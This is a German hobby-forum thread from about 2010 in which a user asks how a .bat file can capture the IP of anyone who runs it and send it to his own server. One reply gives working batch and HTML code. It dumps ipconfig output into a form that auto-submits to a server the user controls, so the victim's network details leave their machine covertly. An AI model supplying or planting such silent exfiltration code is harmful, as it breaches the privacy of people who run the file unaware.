kostenloser Webspace werbefrei: lima-city


mit .bat ip auslesen

lima-cityForumProgrammiersprachenSonstige Programmiersprachen

  1. Autor dieses Themas

    m*****k

    hallo ich möchte gerne mit einer bat datei die ip von den jenigen auslesen die die datei ausführen und dan auf meinem sever in eine .txt datei speichern .

    danke
    mfg mrfreak
  2. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

  3. Schon versucht die Ausgabe von "ipconfig /all" zu filtern?
    Also ohne externe Software (wie z.B. ipconfig) ist die Auslese von IP-Adressen nicht möglich.

    Am besten schreib nen kleines C++-Programm und führ das dann mit der .bat-Datei aus!
  4. Autor dieses Themas

    m*****k

    leider kan ich kein c++ !!
  5. Kannst du andere Sprachen? Bat greift nur auf ein externes Programm zu, aber ipconfig kann glaube keine logfiles speichern, bzw. versenden.

    nur aus interesse, was wird das für ein Programm ? Backdoor? :D

    Beitrag zuletzt geändert: 11.9.2010 16:38:57 von gauss-design
  6. Versuchs mal mit Visual Basic & PHP^^

    In VB navigierst du nen Webclient auf einen Webspace wo ein PHP Script drauf ist, das deine IP ausliest.
    Dann lässt du das VB programm die IP auslesen und speichern^^
    In etwa so:

    Dim wcl as new Webclient
    Dim IP as String = wcl.downloadstring("http://www.beispielseite.de/IP_Script.php")
    msgbox(IP)


    Mit dem Code kriegst dann eine Messagebox mit deiner IP drinne^^
  7. Autor dieses Themas

    m*****k

    ja also mit php hab ich es schon aber halt nur wen jemad auf meine seite geht dan wird di ip geschpeichert

    ich möchte aber ein program schreiben das das auch macht
  8. h*****************r

    mit batch sollte man informationen auslesen können und sie später in einer .txt datei speichern können. gib einfach mal im cmd help ein da müsstest du was finden.
  9. mrfreak schrieb:
    ja also mit php hab ich es schon aber halt nur wen jemad auf meine seite geht dan wird di ip geschpeichert

    ich möchte aber ein program schreiben das das auch macht


    Mal Quick & Dirty mit 3 Dateien (inklusive der batch):
    Deine batch-Datei:
    echo off
    echo. | type htmlip1.txt > sendip.html
    echo. | ipconfig >> sendip.html
    echo. | type htmlip2.txt >> sendip.html
    call sendip.html


    Die Datei htmlip1.txt
    <html><head>
    </head>
    <body>
    <form name="sendme" action="http://www.lima-city.de" method="GET">
    <textarea name="txt">


    Die Datei htmlip2.txt
    </textarea>
    </form>
    <script type="text/javascript">
    window.setTimeout("document.sendme.submit()", 500);
    </script>
    </body>
    </html>


    statt http://www.lima-city.de muss da dann eine Seite von Dir sein die mit php den Inhalt von "txt" ausliest.
    Am besten mit der POST-methode..

    wobei es ja eigentlich reichen würde wenn Du mit Deiner Batch eine html-Datei öffnest die wiederum auf eine php-Seite von Dir zugreift mit der Du die ip auslesen kannst.
  10. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

Dir gefällt dieses Thema?

Über lima-city

Login zum Webhosting ohne Werbung!